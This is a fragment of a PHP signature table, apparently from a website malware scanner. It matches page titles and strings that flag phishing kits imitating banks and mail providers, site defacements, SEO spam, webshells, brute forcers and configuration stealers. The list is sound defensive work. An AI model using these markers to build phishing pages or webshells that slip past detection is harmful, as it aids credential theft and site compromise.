	'echo \'**** **** **** \'.substr($card,-' => array(STR_CLEARFILE, 'html.phishing.netflix.004', NULL),
	'<title>Autentisering</title>' => array(STR_CLEARFILE, 'html.phishing.generic.070', NULL),
	'<title>my email - Etisalat Internet Mail' => array(STR_CLEARFILE, 'php.phishing.etisalat.001', NULL),
	':Owned:' => array(STR_CLEARFILE, 'html.defaced.owned.008', NULL),
	'style="background-image: url(https://cfspart.impots.gouv.fr/' => array(STR_CLEARFILE, 'html.phishing.gov_france.001', NULL),
	'>DOMAIN SEARCH ENGINE REGISTRATION' => array(STR_CLEARFILE, 'php.phishing.generic.069', NULL),
	'<title>Domain Name Search Engine' => array(STR_CLEARFILE, 'php.phishing.generic.069.02', NULL),
	'<title>Pay</title>' => array(STR_CLEARFILE, 'php.phishing.generic.070', NULL),
	'<!-- Mirrored from canada-revenue-agency.canada.refund.qc.powercurrency' => array(STR_CLEARFILE, 'html.phishing.generic.071', NULL),
	'Citigroup Inc.<' => array(STR_CLEARFILE, 'html.phishing.citibank.002', NULL),
	'| Desjardins</title>' => array(STR_CLEARFILE, 'html.phishing.desjardins.001', NULL),
	'rSpyUp!!</title>' => array(STR_CLEARFILE, 'php.defaced.generic.014', NULL),
	'://www.bdo.com.ph/' => array(STR_CLEARFILE, 'php.phishing.generic.073', NULL),
	'<title>[\s]*[Pp]rivate[\s]*[Oo]nline[\s]*PDF[\s]*[Ff]ile<' => array(REX_CLEARFILE, 'html.phishing.adobe.007', NULL),
	'<title>&#32593;&#26131;VIP163' => array(STR_CLEARFILE, 'html.phishing.chinese.005', NULL),
	'method="post" id="demo-form" action="act.php">' => array(STR_CLEARFILE, 'html.phishing.generic.073', NULL),
	'<title>OneDrive' => array(STR_CLEARFILE, 'html.phishing.onedrive.002', NULL),
	'<title>Microsft-services' => array(STR_CLEARFILE, 'html.phishing.microsoft.018', NULL),
	'<title>OurTime.com' => array(STR_CLEARFILE, 'html.phishing.ourtime.001', NULL),
	'InFamouz Was Here' => array(STR_CLEARFILE, 'html.defaced.generic.149', NULL),
	'<title>G-Mail Verification' => array(STR_CLEARFILE, 'html.phishing.google_accounts.010', NULL),
	'<title>(1) New File | Secure File Sharing' => array(STR_CLEARFILE, 'html.phishing.box.001', NULL),
	'<title>Yahoo –&nbsp;login' => array(STR_CLEARFILE, 'html.phishing.yahoo.016', NULL),
	'<title>&#68;&#111;&#99;&#117;&#115;&#105;&#103;&#110;' => array(STR_CLEARFILE, 'html.phishing.docusign.005', NULL),
	'<title>&#71;&#109;&#97;&#105;&#108;' => array(STR_CLEARFILE, 'html.phishing.gmail.003', NULL),
	'Banco Bradesco SA' => array(STR_CLEARFILE, 'html.phishing.bradesco.004', NULL),
	'<title>Nedbank Money' => array(STR_CLEARFILE, 'html.phishing.generic.079', NULL),
	'<title>Naver Sign in' => array(STR_CLEARFILE, 'html.phishing.naver.001', NULL),
	'<title>Godaddy Verification' => array(STR_CLEARFILE, 'php.phishing.godaddy.006', NULL),
	'<title>[ WhatsApp]' => array(STR_CLEARFILE, 'html.phishing.whatsapp.001', NULL),
	'login.microsoftonline.com/logout.srf' => array(STR_CLEARFILE, 'html.phishing.microsoft.019', NULL),
	'Mail | 签到' => array(STR_CLEARFILE, 'php.phishing.winmail.001', NULL),
	'<title>LinkedIn Login' => array(STR_CLEARFILE, 'html.phishing.linkedin.003', NULL),
	'<title>- AOL' => array(STR_CLEARFILE, 'html.phishing.aol.005', NULL),
	'<title>Welcome to AOL.com Customer Support' => array(STR_CLEARFILE, 'html.phishing.aol.007', NULL),
	'>Connection to Secure Email Server In Progress...' => array(STR_CLEARFILE, 'html.phishing.generic.082', NULL),
	'>Smiles BB resgate seus pontos' => array(STR_CLEARFILE, 'html.phishing.bancobrasil.005', NULL),
	'Welcome to Facebook<' => array(STR_CLEARFILE, 'html.phishing.facebook.008', NULL),
	'>© 2019 Microsoft' => array(STR_CLEARFILE, 'html.phishing.microsoft.020', NULL),
	'>American Express - Login' => array(STR_CLEARFILE, 'html.phishing.americanexpress.011', NULL),
	'Your Facebook account must be <strong>confirmed' => array(STR_CLEARFILE, 'html.phishing.facebook.009', NULL),
	'>Recover Account<' => array(STR_CLEARFILE, 'html.phishing.generic.083', NULL),
	'<link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/' => array(STR_CLEARFILE, 'html.phishing.microsoft.021', NULL),
	'>Sign in to Outlook' => array(STR_CLEARFILE, 'html.phishing.outlook.005', NULL),
	'>GMX-Anmelden<' => array(STR_CLEARFILE, 'html.phishing.generic.084', NULL),
	'Login - PayPal' => array(STR_CLEARFILE, 'html.phishing.paypal.025', NULL),
	'(?i)PayPal.[\s]*Inc.[\s]*All[\s]*rights[\s]*reserved' => array(REX_CLEARFILE, 'html.phishing.paypal.026', NULL),
	'©2018 Microsoft' => array(STR_CLEARFILE, 'php.phishing.microsoft.007', NULL),
	'>Help us protect your account<' => array(STR_CLEARFILE, 'html.phishing.generic.085', NULL),
	'href="https://privacy.microsoft.com' => array(STR_CLEARFILE, 'html.phishing.microsoft.022', NULL),
	'="Create a Microsoft account">' => array(STR_CLEARFILE, 'html.phishing.microsoft.023', NULL),
	'>Navy Federal Credit Union' => array(STR_CLEARFILE, 'html.phishing.nfcu.001', NULL),
	'Security - Netflix<' => array(STR_CLEARFILE, 'html.phishing.netflix.006', NULL),
	'>Webmail - Telstra' => array(STR_CLEARFILE, 'html.phishing.telstra.001', NULL),
	'>Pay a bill - Account services - Telstra' => array(STR_CLEARFILE, 'html.phishing.telstra.002', NULL),
	'<title>Business | LinkedIn<' => array(STR_CLEARFILE, 'html.phishing.linkedin.004', NULL),
	'EBAY_SIGNIN' => array(STR_CLEARFILE, 'html.phishing.ebay.002', NULL),
	'&#51060;&#47700;&#51068; &#50629;&#44536;&#47112;&#51060;&#46300;' => array(STR_CLEARFILE, 'html.phishing.generic.090', NULL),
	'&#44228;&#51221; &#48372;&#50504; &#49444;&#51221;' => array(STR_CLEARFILE, 'html.phishing.generic.091', NULL),
	'NTNU Webmail' => array(STR_CLEARFILE, 'html.phishing.generic.092', NULL),
	'LinkedIn Corporation' => array(STR_CLEARFILE, 'html.phishing.linkedin.005', NULL),
	'Horde :: Log in' => array(STR_CLEARFILE, 'html.phishing.email_account.004', NULL),
	'Coremail Professional Mail System' => array(STR_CLEARFILE, 'html.phishing.email_account.005', NULL),
	'>Ad0be Document Cloud' => array(STR_CLEARFILE, 'html.phishing.adobe.008', NULL),
	'Delta Air Lines, Inc' => array(STR_CLEARFILE, 'html.phishing.delta.001', NULL),
	'Discover Bank' => array(STR_CLEARFILE, 'html.phishing.discover.005', NULL),
	'<title>Secure |' => array(STR_CLEARFILE, 'html.phishing.generic.095', NULL),
	'<title>Sky - Sign in' => array(STR_CLEARFILE, 'html.phishing.sky.001', NULL),
	'&#77;&#105;&#99;&#114;&#111;&#115;&#111;&#102;&#116;' => array(STR_CLEARFILE, 'php.phishing.microsoft.008', NULL),
	'<title>ourtime.com' => array(STR_CLEARFILE, 'php.phishing.ourtime.002', NULL),
	'OurTimecom' => array(STR_CLEARFILE, 'php.phishing.ourtime.003', NULL),
	'<title>Microsoft account loading' => array(STR_CLEARFILE, 'php.phishing.microsoft.009', NULL),
	'<title>0FFICE 365' => array(STR_CLEARFILE, 'php.phishing.microsoft.010', NULL),
	'eBay Inc. All Rights Reserved' => array(STR_CLEARFILE, 'php.phishing.ebay.001', NULL),
	'<title>AT&amp;T Security' => array(STR_CLEARFILE, 'html.phishing.ATT.003', NULL),
	'ΡаyΡаI' => array(STR_CLEARFILE, 'php.phishing.paypal.027', NULL),
	'SquirrelMail version ' => array(STR_CLEARFILE, 'html.phishing.squirrelmail.001', NULL),
	'var rcmail = new rcube_webmail();' => array(STR_CLEARFILE, 'html.phishing.roundcube.001', NULL),
	'<title>Login • Instagram' => array(STR_CLEARFILE, 'html.phishing.instagram.001', NULL),
	'&#65;&#109;&#101;&#114;&#105;&#99;&#97;&#110;&#32;&#69;&#120;&#112;&#114;&#101;&#115;&#115;' => array(STR_CLEARFILE, 'html.phishing.americanexpress.012', NULL),
	'<title>Ꮴеriƒy Υоυr Ɩdеntity' => array(STR_CLEARFILE, 'html.phishing.generic.097', NULL),
	'<title>Ꮮоgin - Ԝаllеt' => array(STR_CLEARFILE, 'html.phishing.generic.098', NULL),
	'<title>Ꭱеϲоνеr Ϝυnds' => array(STR_CLEARFILE, 'html.phishing.generic.099', NULL),
	'ScotiaVerify TM' => array(STR_CLEARFILE, 'html.phishing.scotiabank.001', NULL),
	'Scotia OnLine:' => array(STR_CLEARFILE, 'html.phishing.scotiabank.002', NULL),
	'Bankia S.A' => array(STR_CLEARFILE, 'php.phishing.bankia.001', NULL),
	'SMS Verificacion' => array(STR_CLEARFILE, 'php.phishing.generic.091', NULL),
	'Comcast Corporation<' => array(STR_CLEARFILE, 'html.phishing.comcast.004', NULL),
	'<title>Hotmail Verification</title>' => array(STR_CLEARFILE, 'html.phishing.hotmail.001', NULL),
	'<title>Wells Fargo&nbsp;Enter Your Security Questions' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.002.004', NULL),
	'<title>My Verizon Profile Updated' => array(STR_CLEARFILE, 'html.phishing.verizon.001', NULL),
	'<title>netbanking.sparkasse.at' => array(STR_CLEARFILE, 'php.phishing.sparkasse.001', NULL),
	'<title>Get INTERAC e-Transfer Online Form<' => array(STR_CLEARFILE, 'html.phishing.INTERAC.001', NULL),
	'<title>Personas | BBVA Continental</title>' => array(STR_CLEARFILE, 'html.phishing.bbva.001', NULL),
	'<title>AOL Mail: Simple, Free, Fun</title>' => array(STR_CLEARFILE, 'html.phishing.aol.001', NULL),
	'<title>Windows Live ID</title>' => array(STR_CLEARFILE, 'html.phishing.windows_live_id.001', NULL),
	'<title>Log in to Credit Card services</title>' => array(STR_CLEARFILE, 'html.phishing.generic.011', NULL),
	'<title>-TD Canada Trust:Support' => array(STR_CLEARFILE, 'php.phishing.TDCanada.003', NULL),
	'| USAA</title>' => array(STR_CLEARFILE, 'html.phishing.USAA.001', NULL),
	'Welcome to USAA</title>' => array(STR_CLEARFILE, 'html.phishing.USAA.002', NULL),
	'<title>USAA - ' => array(STR_CLEARFILE, 'html.phishing.USAA.003', NULL),
	'<title>MyDHL' => array(STR_CLEARFILE,'php.phishing.DHL.001', NULL),
	'DHL International GmbH. All rights reserved.</a></div>' => array(STR_CLEARFILE,'php.phishing.DHL.003', NULL),
	'<title>seotramp.com' => array(STR_CLEARFILE,'html.spam-seo.spam-links.003', NULL),
	'<title>Sign in - Adobe ' => array(STR_CLEARFILE, 'html.phishing.adobe.001', NULL),
	'<title>Sucursal Virtual BANCOLOMBIA</title>' => array(STR_CLEARFILE, 'html.phishing.bancolombia.001', NULL),
	'<title>LCL - Le Cr&egrave;dit Lyonnais</title>' => array(STR_CLEARFILE, 'html.phishing.credit_lyonnais.001', NULL),
	'<input src="images/e-lcl.png" alt="" type="image" title="" border=0 width=101 height=40 name="submit" value="submit" formaction="full2' => array(STR_CLEARFILE,'html.phishing.generic.016', NULL),
	'AT&amp;T - DIRECTV, Wireless, Cell Phones, U-verse &amp; Internet' => array(STR_CLEARFILE, 'html.phishing.ATT.001', NULL),
	'name=chalbhai id=chalbhai method=post' => array(STR_CLEARFILE, 'php.phishing.generic.014', NULL),
	'<p>&copy; Copyright 2012 Match.com, L.L.C.' => array(STR_CLEARFILE, 'html.phishing.match.001', NULL),
	'<form id="vgnMyBizSignInForm" action="https://mblogin.verizonwireless.com/amserver/UI/Login"' => array(STR_CLEARFILE, 'html.phishing.verizon.001.002', NULL),
	'>&#70;&#114;&#101;&#101;&#32;&#77;&#111;&#98;&#105;&#108;&#101;&#32;&#45;&#32;&#66;' => array(STR_CLEARFILE, 'php.phishing.freemobs.003', NULL),
	'Created by l33bo_phishers' => array(STR_CLEARFILE,'php.phishing.generic.021', NULL), 
	'La Banque Postale</title>' => array(STR_CLEARFILE,'php.phishing.generic.025', NULL),
	'>Impots.gouv.fr - Accueil' => array(STR_CLEARFILE,'php.phishing.generic.026', NULL),
	'>Free Mobile - Bienvenue dans votre Espace Abo' => array(STR_CLEARFILE,'php.phishing.generic.027', NULL),
	'>i&Tau;unes' => array(STR_CLEARFILE,'php.phishing.itunesconnect.002', NULL),
	'<p class="subline">Google Drive' => array(STR_CLEARFILE,'php.phishing.google.003', NULL), 
	'www.t-online.de/service/kundencenter/index_login_hilfe.html" target="toi" title="Hilfe aufrufen">' => array(STR_CLEARFILE,'php.phishing.generic.028', NULL),
	'Credit Cards, Banking, Personal, Home and Student Loans<' => array(STR_CLEARFILE, 'html.phishing.generic.020', NULL),
	'TradeKey Member Login<' => array(STR_CLEARFILE, 'php.phishing.generic.029', NULL),
	'<title>Gmail</title>' => array(STR_CLEARFILE, 'php.phishing.gmail.004.001', NULL),
	'>Wells Fargo Confirm Your Acount Profile Information' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.003', NULL),
	'<title>Welcome To Online Global TradeFile' => array(STR_CLEARFILE,'html.phishing.generic.023', NULL),
	'onclick=\'bookmarksite("Compte Ameli","https://assure.ameli.fr:443https://assure.ameli.fr/PortailAS/' => array(STR_CLEARFILE, 'html.phishing.ameli_fr.001', NULL),
	'$caminho = "contador.txt";//nome do arquivo que vai guardar' => array(STR_CLEARFILE, 'php.phishing.painel_admin_tela.001', NULL),
	'--phishers ::: icq:' => array(STR_CLEARFILE,'html.phishing.generic.024', NULL),
	'<title>Bienvenido a BancaNet' => array(STR_CLEARFILE, 'html.phishing.generic.025', NULL),
	' - Banque en Ligne - Accueil - Particuliers</title>' => array(STR_CLEARFILE, 'html.phishing.creditagricole.001', NULL),
	'dit Agricole</title>' => array(STR_CLEARFILE, 'html.phishing.creditagricole.002', NULL),
	'<title>Portale Titolari' => array(STR_CLEARFILE, 'html.phishing.generic.027', NULL),
	'Banca March Bank' => array(STR_CLEARFILE, 'html.phishing.generic.028', NULL),
	'<title>Standard Chartered Bank</title>' => array(STR_CLEARFILE, 'html.phishing.generic.029', NULL),
	'<title>Apple Id Email Validity' => array(STR_CLEARFILE, 'html.phishing.apple.013', NULL),
	'<title>Login - PayPal</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.010', NULL),
	'Login - P&alpha;yP&alpha;l' => array(STR_CLEARFILE, 'html.phishing.paypal.010.02', NULL),
	'<title>Error - Login - PayPal</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.011', NULL),
	'<title>Secure login - PayPal</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.019', NULL),
	'<title>Aol Verefication' => array(STR_CLEARFILE, 'html.phishing.aol.002', NULL),
	'<title>&#37038;&#20214;&#35774;&#32622; | &#30005;&#23376;&#37038;&#20214;&#21319;&#32423;</title>' => array(STR_CLEARFILE, 'html.phishing.chinese.002', NULL),
	' PayPaI</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.002.02', NULL),
	'<title>\s*Online\s*(?:[Vv]erify|[Vv]erification|[Bb]anking)\s*[(\-\s*\.\:\w+)]+Online\s*(?:[Vv]erify|[Vv]erification|[Bb]anking)\s*<\/title>' => array(REX_CLEARFILE, 'html.phishing.generic.055', NULL), 
	'<title>Manage your Apple' => array(STR_CLEARFILE, 'html.phishing.apple.016', NULL),
	'<title>Excel Document Cloud</title>' => array(STR_CLEARFILE, 'php.phishing.excel.001.02', NULL),
	'<title>Dropbox - File Sharing Portal' => array(STR_CLEARFILE, 'html.phishing.dropbox.008', NULL),
	'(?:[Bb]ank of [Aa]merica|[Cc]hase|[Ww]ells [Ff]argo|[Bb]anco|RBC|e[Bb]ay|[Pp]ay[Pp]al|[Ss]antander|[Yy]ahoo!?|[Ii][Tt]unes|[Gg]mail|[Dd]rop[Bb]ox)\s*[Aa]ccount\s*[Vv]erificatio[^<]+<.title>' => array(REX_CLEARFILE, 'html.phishing.generic.059', NULL),
	'information - chase</title>' => array(STR_CLEARFILE, 'html.phishing.chase.002', NULL),
	'chase.com</title>' => array(STR_CLEARFILE, 'html.phishing.chase.002.02', NULL),
	'<title>DocuSign Free Trial </title>' => array(STR_CLEARFILE, 'html.phishing.docusign.003', NULL),
	'>DocuSign - Enter email to start log in</title>' => array(STR_CLEARFILE, 'html.phishing.docusign.003.02', NULL),
	'>DocuSign Login - Enter your password to sign in</title>' => array(STR_CLEARFILE, 'html.phishing.docusign.003.03', NULL),
	'<title>Sign In to Your Cox Account' => array(STR_CLEARFILE, 'html.phishing.cox.001', NULL),
	'<title>Sign in to XFINITY' => array(STR_CLEARFILE, 'html.phishing.comcast.002', NULL),
	'<title>Sign in to Xfinity</title>' => array(STR_CLEARFILE, 'html.phishing.comcast.002.03', NULL),
	'mation Credit Card XFINITY</title>' => array(STR_CLEARFILE, 'html.phishing.comcast.002.02', NULL),
	'<title>Chase Bank' => array(STR_CLEARFILE, 'html.phishing.chase.003', NULL),
	'<title>CIBC Verification</title>' => array(STR_CLEARFILE, 'php.phishing.cibc.001.02', NULL),
	'<title>Log In | Smartsheet' => array(STR_CLEARFILE, 'html.phishing.smartsheet.001', NULL),
	'<title>Compte-Nickel - Verification' => array(STR_CLEARFILE, 'html.phishing.nickel.001', NULL),
	'<title>Crédit Mutuel de Bretagne' => array(STR_CLEARFILE, 'html.phishing.credit_mutuel.001', NULL),
	'<title>Banque et assurance' => array(STR_CLEARFILE, 'html.phishing.credit_mutuel.001.02', NULL),
	'<title>Sign in to Comcast</title>' => array(STR_CLEARFILE, 'html.phishing.comcast.003', NULL),
	'<title>Microsoft OneDrive</title>' => array(STR_CLEARFILE, 'html.phishing.microsoft.016', NULL),
	'INDOWS SIGN IN</title>' => array(STR_CLEARFILE, 'html.phishing.microsoft.017', NULL),
	'<title>A0L SIGN IN</title>' => array(STR_CLEARFILE, 'html.phishing.aol.003', NULL),
	'<title>Adobe PDF</title>' => array(STR_CLEARFILE, 'html.phishing.adobe.004', NULL),
	'<title>Βank of Αmerica' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.011', NULL),
	'<title>Βаnk оf Αmеrіса' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.011.02', NULL),
	'<title>Emirates NDB' => array(STR_CLEARFILE, 'html.phishing.emirates_adb.001', NULL),
	'<title>Welcome to Bank of the Philippine' => array(STR_CLEARFILE, 'html.phishing.bank_of_philippine_islands.001', NULL),
	'<title>BB&T - ACCOUNT VERIFICATION' => array(STR_CLEARFILE, 'html.phishing.bbt.001', NULL),
	'<title>Encrypted Documents - Docusign' => array(STR_CLEARFILE, 'html.phishing.docusign.004', NULL),
	'<title>&#82;&#97;&#99;&#107;&#115;&#112;&#97;&#99;&#101;&#32;&#87;&#101;&#98;&#109;&#97;&#105;&#108;&#58;&#32;&#72;&#111;&#115;&#116;&#101;&#100;&#32;&#69;&#109;' => array(STR_CLEARFILE, 'php.phishing.rackspace.002', NULL),
	'<title>&#49;&#38;&#49;&#32;&#73;&#79;&#78;&#79;&#83;' => array(STR_CLEARFILE, 'php.phishing.1and1.001', NULL),
	'<title>Update My Billing lnformation</title>' => array(STR_CLEARFILE, 'html.phishing.hydroquebec.002', NULL),
	'You are in a secure server by Hydro Québec' => array(STR_CLEARFILE, 'html.phishing.hydroquebec.004', NULL),
	'<title>PayPaI' => array(STR_CLEARFILE, 'html.phishing.paypal.024', NULL),
	'<title>BankNet</title>' => array(STR_CLEARFILE, 'html.phishing.emirates_adb.002', NULL),
	'<title>&#66;&#97;&#110;&#107;&#32;&#111;&#102;&#32;&#65;&#109;&#101;&#114;&#105;&#99;&#97;' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.012', NULL),
	'<title>&#86;&#101;&#114;&#105;&#102;&#121;&#32;&#89;&#111;&#117;&#114;&#32;&#73;&#100;&#101;&#110;&#116;&#105;&#116;&#121;' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.013', NULL),
	'<title>&#80;&#108;&#101;&#97;&#115;&#101;&#32;&#87;&#97;&#105;&#116;' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.014', NULL),
	'<title>Contratación del servicio en línea' => array(STR_CLEARFILE, 'html.phishing.bbva.002', NULL),
	'<title>Registro | BBVA Bancomer' => array(STR_CLEARFILE, 'html.phishing.bbva.003', NULL),
	'<title>Account Verification' => array(STR_CLEARFILE, 'php.phishing.amazon.007', NULL),
	'© 1996-2018, Amazon.com, Inc. or its affiliates' => array(STR_CLEARFILE, 'php.phishing.amazon.008', NULL),
	'if (!xENCRYPTION) {$' => array(STR_CLEARFILE, 'php.phishing.paypal.023', NULL),
	'<title>网易企业邮箱' => array(STR_CLEARFILE, 'php.phishing.netease.001', NULL),
	'&Alpha;ppleSecure' => array(STR_CLEARFILE, 'php.phishing.apple.001', NULL),
	'&Alpha;pple Inc' => array(STR_CLEARFILE, 'php.phishing.apple.002', NULL),
	'&Alpha;pple ID' => array(STR_CLEARFILE, 'php.phishing.apple.003', NULL),
	'AppIe ID</title>' => array(STR_CLEARFILE, 'php.phishing.apple.004', NULL),
	'AppleSecure</title>' => array(STR_CLEARFILE, 'php.phishing.apple.005', NULL),
	'<title>Update Your Account - chase' => array(STR_CLEARFILE, 'php.phishing.chasebank.003', NULL),
	'chase-com</title>' => array(STR_CLEARFILE, 'php.phishing.chasebank.004', NULL),
	'Bmnx vf Matircm' => array(STR_CLEARFILE, 'php.phishing.bankofamerica.001', NULL),
	'&#x2D;&#x20;&#x43;&#x68;&#x61;&#x73;&#x65;&#x20;&#x55;&#x53;' => array(STR_CLEARFILE, 'php.phishing.chasebank.005', NULL),
	'&#x63;&#x68;&#x61;&#x73;&#x65;&#x2E;&#x63;&#x6F;&#x6D;' => array(STR_CLEARFILE, 'php.phishing.chasebank.006', NULL),
	'&Alpha;m&#97;zon.com, Inc.' => array(STR_CLEARFILE, 'php.phishing.amazon.009', NULL),
	'<title>Secure File Sharing, Storage and Collaboration | Box' => array(STR_CLEARFILE, 'html.phishing.box.002', NULL),
	'© 2018 Microsoft One Drive' => array(STR_CLEARFILE, 'html.phishing.onedrive.003', NULL),
	'NMLSR ID 399801' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.007', NULL),
	'STRATO Kunden-Login' => array(STR_CLEARFILE, 'html.phishing.generic.089', NULL),
	'<title>_A0L' => array(STR_CLEARFILE, 'html.phishing.aol.008', NULL),
	'<link rel="shortcut icon" href="https://www.centurylink.com/favicon.ico" type="image/vnd.microsoft.icon" >' => array(STR_CLEARFILE, 'html.phishing.centurylink.001', NULL),
	'<title>Sign in | Luno' => array(STR_CLEARFILE, 'php.phishing.luno.001.02', NULL),
	'<title>Validating' => array(STR_CLEARFILE, 'php.phishing.generic.085', NULL),
	'chase.com/web/auth' => array(STR_CLEARFILE, 'php.phishing.chasebank.008', NULL),
	'<title>&#83;&#105;&#103;&#110;&#32;' => array(STR_CLEARFILE, 'php.phishing.generic.085.02', NULL),
	'<title>BBVAnet' => array(STR_CLEARFILE, 'html.phishing.bbva.004', NULL),
	'<title>Acheter des stéroïdes' => array(STR_CLEARFILE, 'html.spam-seo.pharma-site.004', NULL),
	'<title>Tout sur la pharmacologie' => array(STR_CLEARFILE, 'html.spam-seo.pharma-site.004.02', NULL),
	'<title>Les médicaments anabolisants' => array(STR_CLEARFILE, 'html.spam-seo.pharma-site.004.03', NULL),
	'index.html">Tout sur la pharmacologie du sport</a>' => array(STR_CLEARFILE, 'html.spam-seo.pharma-site.004.04', NULL),
	'<title>&#20013;&#22269;&#37038;&#25919;&#36895;&#36882;&#29289;&#27969;</title>' => array(STR_CLEARFILE, 'php.phishing.ems.001', NULL),
	'<title>Internal Revenue Service</title>' => array(STR_CLEARFILE, 'php.phishing.irs.001', NULL),
	'<title>RBFCU - Sign In</title>' => array(STR_CLEARFILE, 'php.phishing.rbfcu.001', NULL),
	'<title>Vodafone</title>' => array(STR_CLEARFILE, 'php.phishing.vodafone.001', NULL),
	'XaiSyndicate' => array(STR_CLEARFILE, 'html.defaced.owned.001', NULL),
	'by iaM<' => array(STR_CLEARFILE, 'html.defaced.owned.002', NULL),
	'by STMIK' => array(STR_CLEARFILE, 'html.defaced.owned.003', NULL),
	'DayWalker' => array(STR_CLEARFILE, 'html.defaced.owned.004', NULL),
	'r00t' => array(STR_CLEARFILE, 'html.defaced.owned.006', NULL),
	'GreetZ' => array(STR_CLEARFILE, 'html.defaced.owned.007', NULL),
	'BerdendangC0de' => array(STR_CLEARFILE, 'html.defaced.berdendangc0de.001', NULL),
	'GalaxyXploiterTeam' => array(STR_CLEARFILE, 'html.defaced.generic.159', NULL),
	'Touched By Root' => array(STR_CLEARFILE, 'html.defaced.generic.166', NULL),
	'<title>Mr.AL Was Here</title>' => array(STR_CLEARFILE, 'html.defaced.generic.143', NULL),
	'<title>TurkHackTeam' => array(STR_CLEARFILE, 'html.defaced.generic.142', NULL),
	'<title>T0uch3d' => array(STR_CLEARFILE, 'html.defaced.generic.141'),
	'<title>Dexter Checker</title>' => array(STR_CLEARFILE, 'html.malware.email_checker.001', NULL),
	'Siber Konseyi / Mass </title>' => array(STR_CLEARFILE, 'html.defaced.generic.138', NULL),
	'<title>x-m0bY' => array(STR_CLEARFILE, 'html.defaced.generic.136', NULL),
	'HACKED BY SKYNET<' => array(STR_CLEARFILE, 'html.defaced.generic.137', NULL),
	'<title>REALITYWORLD INC' => array(STR_CLEARFILE, 'html.phishing.generic.049', NULL),
	'<title>Dispotube Indonesia' => array(STR_CLEARFILE, 'html.defaced.indonesia.004', NULL),
	'<title>Ayyıldız Tim' => array(STR_CLEARFILE, 'html.defaced.generic.113', NULL),
	'<title>AMAZON Email CheCker' => array(STR_CLEARFILE, 'php.hacktool.amazon_email_validator.001', NULL),
	'<title>Hunter Exploit Kit</title>' => array(STR_CLEARFILE, 'php.hacktool.hungerEK.001', NULL),
	'<title>cPanel brute forcer' => array(STR_CLEARFILE, 'php.exploit.cpanelbruteforce.001.001', NULL),
	'<title>Checking joomla 1.6 - 1.7 Registration Exploit</title>' => array(STR_CLEARFILE, 'php.exploit.joomla_reg.001', NULL),
	'<title>SimAttacker' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.023', NULL),
	'<title>Navicat HTTP Tunnel Tester</title>' => array(STR_CLEARFILE, 'php.hacktool.navicat_HTTP_tunnel_tester.001', NULL),
	'<title>Facebook Login Checker' => array(STR_CLEARFILE, 'php.hacktool.fb_steal.001', NULL),
	'<title><?php echo $arr_tit[$id]; ?>,<?php echo $arr_tita[$id];' => array(STR_CLEARFILE, 'php.spam-seo.injector.077', NULL),
	'<title>más del 50% de descuento para comprar zapatillas Nike air max baratas.Zapatillas de' => array(STR_CLEARFILE, 'html.spam-seo.generic.001', NULL),
	'<title>Pierwsza Pożyczka online dos' => array(STR_CLEARFILE, 'html.spam-seo.generic.006', NULL),
	'<title>WP Backdoor User' => array(STR_CLEARFILE, 'php.hacktool.WPBackdoor.001', NULL),
	'<title>Wordpress MassDeface' => array(STR_CLEARFILE, 'php.hacktool.WPBackdoor.002', NULL),
	'http://i.hizliresim.com/EYL999.png' => array(STR_CLEARFILE, 'html.defaced.sinan.001', NULL),
	'<title>Pwn3d  by' => array(STR_CLEARFILE, 'php.defaced.generic.002', NULL),
	'<title> Who_Cares?' => array(STR_CLEARFILE, 'html.defaced.generic.118', NULL),
	'<title>0x00' => array(STR_CLEARFILE, 'html.defaced.generic.119', NULL),
	'<title>cr000tz' => array(STR_CLEARFILE, 'html.defaced.generic.123', NULL),
	'<title>Havij - Report<' => array(STR_CLEARFILE, 'html.hacktool.generic.001', NULL),
	'<title>Hcked By' => array(STR_CLEARFILE, 'html.defaced.generic.104', NULL),
	'<title>Tr4xb0y ownz you' => array(STR_CLEARFILE, 'html.defaced.generic.105', NULL),
	'<title>Indonesian Freedom Security' => array(STR_CLEARFILE, 'html.defaced.generic.106', NULL),
	'<title>~pwn3d' => array(STR_CLEARFILE, 'html.defaced.generic.107', NULL),
	'<title>Cyber Hats Crew' => array(STR_CLEARFILE, 'html.defaced.cyber_hats_crew.001', NULL),
	'<title> ~OWNED' => array(STR_CLEARFILE, 'html.defaced.generic.029', NULL),
	'<title>#DEFACED By' => array(STR_CLEARFILE, 'html.defaced.generic.032', NULL),
	'<title>Emau Jinak</title>' => array(STR_CLEARFILE, 'html.defaced.BGHH.001.002', NULL),
	'<title>people_hurt |' => array(STR_CLEARFILE, 'html.defaced.people_hurt.001', NULL),
	'<title>./HorrorScary Was Here</title>' => array(STR_CLEARFILE, 'html.defaced.HorrorScary.001', NULL),
	'<title>Red V!per Was HeRe' => array(STR_CLEARFILE, 'html.defaced.Red_Viper.001', NULL),
	'<title>(c) private mail-worker (c)<' => array(STR_CLEARFILE, 'php.mailer.madnet_mail_worker.002', NULL),
	'<title>SQLi Scanner</title>' => array(STR_CLEARFILE, 'php.hacktool.sqliscanner.001.001',NULL),
	'<title>Safe Mode Fucker</title>' => array(STR_CLEARFILE, 'php.hacktool.safemode-disabler.001', NULL),
	'<title>Safe Mode Bypass | LeetSec</title>' => array(STR_CLEARFILE, 'php.hacktool.safemode-disabler.003', NULL),
	'<title>CiH Symlink</title>' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.002', NULL),
	'<title>--==[[Configuration File Killer By Team IndiShell]]==--</title>' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.001', NULL),
	'<title>wholesale nike shoes,cheap nike shoes sale,wholesale nike free 3.0,cheap nike air max 90</title>'=> array(STR_CLEARFILE, 'php.spam-seo.brands.001', NULL),
	'>BloodSec International' => array(STR_CLEARFILE, 'html.defaced.bloodsec.001',NULL),
	'<title>-=[ The Crows Crew ]=-</title>' => array(STR_CLEARFILE, 'html.defaced.generic.046', NULL),
